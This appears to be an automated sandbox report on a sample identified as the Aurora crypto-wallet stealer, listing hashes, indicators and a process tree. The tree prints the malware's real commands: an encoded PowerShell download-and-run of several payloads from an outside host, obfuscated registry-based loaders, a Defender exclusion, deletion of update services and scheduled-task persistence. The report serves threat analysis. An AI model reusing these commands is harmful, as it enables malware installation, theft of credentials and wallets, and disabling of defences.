aurora | 57c6178936a9099249ebaf6d831a2d2e2b767c085850dba55f76689c2ef9490a

Analysis

max time kernel
153s
max time network
40s
platform
windows7_x64
resource
win7-20230220-en
resource tags

arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
submitted
29-03-2023 05:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

C4Client.exe
Size

687.6MB
MD5

6dc896f98f315d59f7ff0a23ec918e68
SHA1

e52e78a5f7eb29cd4eca84e47943fce5028961dd
SHA256

0ce0f0ddf91c200d8a9c91c3c47f807ecc26de890de8e4dc83ec4f5a08404a06
SHA512

2ac4b6f3f9014f33bc6e1a0d8fc741fbba2e6918d35bdf572bf19a4ff3ee576671796a0f52398afd620c67963fe4b6700fe8faae19f47c8517b3658263a30dff
SSDEEP

3072:0nTjRD5V730BSng7tJr8Khw6pItWgAEqjAxou3e7BNIdOAg0FujDvktlL0BjMwmk:G1V7h2r/hwNWgAEqjAKmkAOECjMwm

Score

10^/10

aurora evasion spyware stealer

Malware Config

Extracted

Family

aurora

107.182.129.73:8081

Signatures

Aurora
Aurora is a crypto wallet stealer written in Golang.
stealer aurora

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs

Processes:

SmartDefRun.exepowershell.EXE

description	pid	process	target process
PID 1828 created 1260	1828	SmartDefRun.exe	Explorer.EXE
PID 1828 created 1260	1828	SmartDefRun.exe	Explorer.EXE
PID 1828 created 1260	1828	SmartDefRun.exe	Explorer.EXE
PID 1828 created 1260	1828	SmartDefRun.exe	Explorer.EXE
PID 1352 created 416	1352	powershell.EXE	winlogon.exe

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

4 540 powershell.exe
Downloads MZ/PE file
Drops file in Drivers directory 1 IoCs

Processes:

SmartDefRun.exe

description ioc process

File created C:\Windows\System32\drivers\etc\hosts SmartDefRun.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489
Executes dropped EXE 4 IoCs

Processes:

C4Loader.exenew2.exeSysApp.exeSmartDefRun.exe

pid process

1568 C4Loader.exe
992 new2.exe
2020 SysApp.exe
1828 SmartDefRun.exe
Loads dropped DLL 7 IoCs

Processes:

powershell.exe

pid process

540 powershell.exe
540 powershell.exe
540 powershell.exe
540 powershell.exe
540 powershell.exe
540 powershell.exe
540 powershell.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

flow	pid	process
4	540	powershell.exe

description	ioc	process
File created	C:\Windows\System32\drivers\etc\hosts	SmartDefRun.exe

pid	process
1568	C4Loader.exe
992	new2.exe
2020	SysApp.exe
1828	SmartDefRun.exe

Drops file in System32 directory 4 IoCs

Processes:

powershell.EXEpowershell.EXEpowershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

C4Client.exeSmartDefRun.exepowershell.EXE

description	pid	process	target process
PID 2040 set thread context of 932	2040	C4Client.exe	RegSvcs.exe
PID 1828 set thread context of 1904	1828	SmartDefRun.exe	dialer.exe
PID 1352 set thread context of 1796	1352	powershell.EXE	dllhost.exe

Drops file in Program Files directory 1 IoCs

Processes:

SmartDefRun.exe

description ioc process

File created C:\Program Files\WindowsDefenderUpd/Defender\UpdatedSmartScreen.exe SmartDefRun.exe
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid process

552 sc.exe
1996 sc.exe
900 sc.exe
1988 sc.exe
1876 sc.exe
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

1220 2040 WerFault.exe C4Client.exe
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

1936 schtasks.exe
880 schtasks.exe

description	ioc	process
File created	C:\Program Files\WindowsDefenderUpd/Defender\UpdatedSmartScreen.exe	SmartDefRun.exe

pid	process
552	sc.exe
1996	sc.exe
900	sc.exe
1988	sc.exe
1876	sc.exe

pid	pid_target	process	target process
1220	2040	WerFault.exe	C4Client.exe

pid	process
1936	schtasks.exe
880	schtasks.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

powershell.EXE

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 509ec4a50f62d901	powershell.EXE

Suspicious behavior: EnumeratesProcesses 55 IoCs

Processes:

powershell.exeSmartDefRun.exeSysApp.exepowershell.exepowershell.exepowershell.EXEpowershell.EXEdllhost.exe

pid	process
540	powershell.exe
540	powershell.exe
540	powershell.exe
540	powershell.exe
540	powershell.exe
540	powershell.exe
540	powershell.exe
540	powershell.exe
540	powershell.exe
1828	SmartDefRun.exe
1828	SmartDefRun.exe
2020	SysApp.exe
2020	SysApp.exe
2020	SysApp.exe
2020	SysApp.exe
2020	SysApp.exe
1552	powershell.exe
1828	SmartDefRun.exe
1828	SmartDefRun.exe
1828	SmartDefRun.exe
1828	SmartDefRun.exe
868	powershell.exe
1828	SmartDefRun.exe
1828	SmartDefRun.exe
964	powershell.EXE
1352	powershell.EXE
1352	powershell.EXE
1796	dllhost.exe
1796	dllhost.exe
1796	dllhost.exe
1796	dllhost.exe
1796	dllhost.exe
1796	dllhost.exe
1796	dllhost.exe
1796	dllhost.exe
1796	dllhost.exe
1796	dllhost.exe
1796	dllhost.exe
1796	dllhost.exe
1796	dllhost.exe
1796	dllhost.exe
1796	dllhost.exe
1796	dllhost.exe
1796	dllhost.exe
1796	dllhost.exe
1796	dllhost.exe
1796	dllhost.exe
1796	dllhost.exe
1796	dllhost.exe
1796	dllhost.exe
1796	dllhost.exe
1796	dllhost.exe
1796	dllhost.exe
1796	dllhost.exe
1796	dllhost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exewmic.exepowershell.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	540	powershell.exe
Token: SeIncreaseQuotaPrivilege	2012	wmic.exe
Token: SeSecurityPrivilege	2012	wmic.exe
Token: SeTakeOwnershipPrivilege	2012	wmic.exe
Token: SeLoadDriverPrivilege	2012	wmic.exe
Token: SeSystemProfilePrivilege	2012	wmic.exe
Token: SeSystemtimePrivilege	2012	wmic.exe
Token: SeProfSingleProcessPrivilege	2012	wmic.exe
Token: SeIncBasePriorityPrivilege	2012	wmic.exe
Token: SeCreatePagefilePrivilege	2012	wmic.exe
Token: SeBackupPrivilege	2012	wmic.exe
Token: SeRestorePrivilege	2012	wmic.exe
Token: SeShutdownPrivilege	2012	wmic.exe
Token: SeDebugPrivilege	2012	wmic.exe
Token: SeSystemEnvironmentPrivilege	2012	wmic.exe
Token: SeRemoteShutdownPrivilege	2012	wmic.exe
Token: SeUndockPrivilege	2012	wmic.exe
Token: SeManageVolumePrivilege	2012	wmic.exe
Token: 33	2012	wmic.exe
Token: 34	2012	wmic.exe
Token: 35	2012	wmic.exe
Token: SeIncreaseQuotaPrivilege	2012	wmic.exe
Token: SeSecurityPrivilege	2012	wmic.exe
Token: SeTakeOwnershipPrivilege	2012	wmic.exe
Token: SeLoadDriverPrivilege	2012	wmic.exe
Token: SeSystemProfilePrivilege	2012	wmic.exe
Token: SeSystemtimePrivilege	2012	wmic.exe
Token: SeProfSingleProcessPrivilege	2012	wmic.exe
Token: SeIncBasePriorityPrivilege	2012	wmic.exe
Token: SeCreatePagefilePrivilege	2012	wmic.exe
Token: SeBackupPrivilege	2012	wmic.exe
Token: SeRestorePrivilege	2012	wmic.exe
Token: SeShutdownPrivilege	2012	wmic.exe
Token: SeDebugPrivilege	2012	wmic.exe
Token: SeSystemEnvironmentPrivilege	2012	wmic.exe
Token: SeRemoteShutdownPrivilege	2012	wmic.exe
Token: SeUndockPrivilege	2012	wmic.exe
Token: SeManageVolumePrivilege	2012	wmic.exe
Token: 33	2012	wmic.exe
Token: 34	2012	wmic.exe
Token: 35	2012	wmic.exe
Token: SeDebugPrivilege	1552	powershell.exe
Token: SeIncreaseQuotaPrivilege	1292	WMIC.exe
Token: SeSecurityPrivilege	1292	WMIC.exe
Token: SeTakeOwnershipPrivilege	1292	WMIC.exe
Token: SeLoadDriverPrivilege	1292	WMIC.exe
Token: SeSystemProfilePrivilege	1292	WMIC.exe
Token: SeSystemtimePrivilege	1292	WMIC.exe
Token: SeProfSingleProcessPrivilege	1292	WMIC.exe
Token: SeIncBasePriorityPrivilege	1292	WMIC.exe
Token: SeCreatePagefilePrivilege	1292	WMIC.exe
Token: SeBackupPrivilege	1292	WMIC.exe
Token: SeRestorePrivilege	1292	WMIC.exe
Token: SeShutdownPrivilege	1292	WMIC.exe
Token: SeDebugPrivilege	1292	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1292	WMIC.exe
Token: SeRemoteShutdownPrivilege	1292	WMIC.exe
Token: SeUndockPrivilege	1292	WMIC.exe
Token: SeManageVolumePrivilege	1292	WMIC.exe
Token: 33	1292	WMIC.exe
Token: 34	1292	WMIC.exe
Token: 35	1292	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1292	WMIC.exe
Token: SeSecurityPrivilege	1292	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

C4Client.exeRegSvcs.exepowershell.exenew2.execmd.execmd.execmd.exe

description	pid	process	target process
PID 2040 wrote to memory of 932	2040	C4Client.exe	RegSvcs.exe
PID 2040 wrote to memory of 932	2040	C4Client.exe	RegSvcs.exe
PID 2040 wrote to memory of 932	2040	C4Client.exe	RegSvcs.exe
PID 2040 wrote to memory of 932	2040	C4Client.exe	RegSvcs.exe
PID 2040 wrote to memory of 932	2040	C4Client.exe	RegSvcs.exe
PID 2040 wrote to memory of 932	2040	C4Client.exe	RegSvcs.exe
PID 2040 wrote to memory of 932	2040	C4Client.exe	RegSvcs.exe
PID 2040 wrote to memory of 932	2040	C4Client.exe	RegSvcs.exe
PID 2040 wrote to memory of 932	2040	C4Client.exe	RegSvcs.exe
PID 2040 wrote to memory of 1220	2040	C4Client.exe	WerFault.exe
PID 2040 wrote to memory of 1220	2040	C4Client.exe	WerFault.exe
PID 2040 wrote to memory of 1220	2040	C4Client.exe	WerFault.exe
PID 2040 wrote to memory of 1220	2040	C4Client.exe	WerFault.exe
PID 932 wrote to memory of 540	932	RegSvcs.exe	powershell.exe
PID 932 wrote to memory of 540	932	RegSvcs.exe	powershell.exe
PID 932 wrote to memory of 540	932	RegSvcs.exe	powershell.exe
PID 932 wrote to memory of 540	932	RegSvcs.exe	powershell.exe
PID 540 wrote to memory of 1568	540	powershell.exe	C4Loader.exe
PID 540 wrote to memory of 1568	540	powershell.exe	C4Loader.exe
PID 540 wrote to memory of 1568	540	powershell.exe	C4Loader.exe
PID 540 wrote to memory of 1568	540	powershell.exe	C4Loader.exe
PID 540 wrote to memory of 992	540	powershell.exe	new2.exe
PID 540 wrote to memory of 992	540	powershell.exe	new2.exe
PID 540 wrote to memory of 992	540	powershell.exe	new2.exe
PID 540 wrote to memory of 992	540	powershell.exe	new2.exe
PID 540 wrote to memory of 2020	540	powershell.exe	SysApp.exe
PID 540 wrote to memory of 2020	540	powershell.exe	SysApp.exe
PID 540 wrote to memory of 2020	540	powershell.exe	SysApp.exe
PID 540 wrote to memory of 2020	540	powershell.exe	SysApp.exe
PID 540 wrote to memory of 1828	540	powershell.exe	SmartDefRun.exe
PID 540 wrote to memory of 1828	540	powershell.exe	SmartDefRun.exe
PID 540 wrote to memory of 1828	540	powershell.exe	SmartDefRun.exe
PID 540 wrote to memory of 1828	540	powershell.exe	SmartDefRun.exe
PID 992 wrote to memory of 2012	992	new2.exe	wmic.exe
PID 992 wrote to memory of 2012	992	new2.exe	wmic.exe
PID 992 wrote to memory of 2012	992	new2.exe	wmic.exe
PID 992 wrote to memory of 1624	992	new2.exe	cmd.exe
PID 992 wrote to memory of 1624	992	new2.exe	cmd.exe
PID 992 wrote to memory of 1624	992	new2.exe	cmd.exe
PID 1624 wrote to memory of 1292	1624	cmd.exe	WMIC.exe
PID 1624 wrote to memory of 1292	1624	cmd.exe	WMIC.exe
PID 1624 wrote to memory of 1292	1624	cmd.exe	WMIC.exe
PID 1596 wrote to memory of 1996	1596	cmd.exe	sc.exe
PID 1596 wrote to memory of 1996	1596	cmd.exe	sc.exe
PID 1596 wrote to memory of 1996	1596	cmd.exe	sc.exe
PID 1596 wrote to memory of 900	1596	cmd.exe	sc.exe
PID 1596 wrote to memory of 900	1596	cmd.exe	sc.exe
PID 1596 wrote to memory of 900	1596	cmd.exe	sc.exe
PID 1596 wrote to memory of 1988	1596	cmd.exe	sc.exe
PID 1596 wrote to memory of 1988	1596	cmd.exe	sc.exe
PID 1596 wrote to memory of 1988	1596	cmd.exe	sc.exe
PID 1596 wrote to memory of 1876	1596	cmd.exe	sc.exe
PID 1596 wrote to memory of 1876	1596	cmd.exe	sc.exe
PID 1596 wrote to memory of 1876	1596	cmd.exe	sc.exe
PID 1596 wrote to memory of 552	1596	cmd.exe	sc.exe
PID 1596 wrote to memory of 552	1596	cmd.exe	sc.exe
PID 1596 wrote to memory of 552	1596	cmd.exe	sc.exe
PID 992 wrote to memory of 1816	992	new2.exe	cmd.exe
PID 992 wrote to memory of 1816	992	new2.exe	cmd.exe
PID 992 wrote to memory of 1816	992	new2.exe	cmd.exe
PID 1816 wrote to memory of 1768	1816	cmd.exe	WMIC.exe
PID 1816 wrote to memory of 1768	1816	cmd.exe	WMIC.exe
PID 1816 wrote to memory of 1768	1816	cmd.exe	WMIC.exe
PID 1596 wrote to memory of 1096	1596	cmd.exe	reg.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:476

C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
1⤵
PID:460

C:\Windows\system32\sppsvc.exe
C:\Windows\system32\sppsvc.exe
2⤵
PID:1784

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
2⤵
PID:528

C:\Windows\system32\taskhost.exe
"taskhost.exe"
2⤵
PID:1120

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
2⤵
PID:1044

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
2⤵
PID:480

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService
2⤵
PID:240

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService
2⤵
PID:968

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs
2⤵
PID:844

C:\Windows\system32\taskeng.exe
taskeng.exe {411FAFD7-251D-482D-AC1C-A4406BD0FA26} S-1-5-18:NT AUTHORITY\System:Service:
3⤵
PID:112

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+''+'F'+''+[Char](84)+''+[Char](87)+'A'+'R'+'E').GetValue(''+[Char](100)+''+'i'+''+[Char](97)+'l'+'e'+'rs'+[Char](116)+''+[Char](97)+''+'g'+''+'e'+'r')).EntryPoint.Invoke($Null,$Null)
4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:964

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+'F'+''+[Char](84)+''+[Char](87)+''+'A'+'R'+'E'+'').GetValue('d'+[Char](105)+'al'+[Char](101)+'rsta'+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)
4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:1352

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
2⤵
PID:816

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
2⤵
PID:748

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS
2⤵
PID:672

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
2⤵
PID:596

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:416

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{e07da90d-68a8-4d0e-b2f9-85ca73007d8f}
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1796

\\?\C:\Windows\system32\wbem\WMIADAP.EXE
wmiadap.exe /F /T /R
1⤵
PID:1968

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1260

C:\Users\Admin\AppData\Local\Temp\C4Client.exe
"C:\Users\Admin\AppData\Local\Temp\C4Client.exe"
2⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2040

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:932

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAZgBuACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdQB1AHIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcgBuAHkAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZQBlAG4AIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcALAAgADwAIwB5AHYAdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHYAaQBoACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHoAZgBxACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcAKQApADwAIwBoAGMAcQAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBuAGUAdwAyAC4AZQB4AGUAJwAsACAAPAAjAGcAcwB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAagBwAG4AIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcQBzAHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQApADwAIwBqAHYAeAAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAHkAcwBBAHAAcAAuAGUAeABlACcALAAgADwAIwBxAHkAbQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAdAB6ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGkAeQBnACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApACkAPAAjAGUAaABkACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcALAAgADwAIwBiAHgAZwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAYwBiACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHMAZwBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcAKQApADwAIwB1AHIAZAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB0AGoAbAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcQBqAHMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwA0AEwAbwBhAGQAZQByAC4AZQB4AGUAJwApADwAIwBwAGMAegAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBxAGkAdQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAagBqAHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQA8ACMAeQB5AGUAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdwBzAGQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAbAB0ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApADwAIwB0AGoAbQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB2AHIAdQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAagByAHcAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwBtAGEAcgB0AEQAZQBmAFIAdQBuAC4AZQB4AGUAJwApADwAIwBwAGcAdQAjAD4A"
4⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:540

C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
"C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
5⤵
- Executes dropped EXE
PID:1568

C:\Users\Admin\AppData\Local\Temp\new2.exe
"C:\Users\Admin\AppData\Local\Temp\new2.exe"
5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:992

C:\Windows\System32\Wbem\wmic.exe
wmic os get Caption
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2012

C:\Windows\system32\cmd.exe
cmd /C "wmic path win32_VideoController get name"
6⤵
- Suspicious use of WriteProcessMemory
PID:1624

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:1292

C:\Windows\system32\cmd.exe
cmd /C "wmic cpu get name"
6⤵
- Suspicious use of WriteProcessMemory
PID:1816

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get name
7⤵
PID:1768

C:\Users\Admin\AppData\Local\Temp\SysApp.exe
"C:\Users\Admin\AppData\Local\Temp\SysApp.exe"
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2020

C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"
6⤵
- Creates scheduled task(s)
PID:880

C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
"C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"
5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:1828

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2040 -s 72
3⤵
- Program crash
PID:1220

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1552

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
- Suspicious use of WriteProcessMemory
PID:1596

C:\Windows\System32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:1996

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:900

C:\Windows\System32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:1988

C:\Windows\System32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:1876

C:\Windows\System32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:552

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:1096

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
3⤵
PID:1748

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
3⤵
- Modifies security service
PID:1064

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
3⤵
PID:1716

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:1008

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
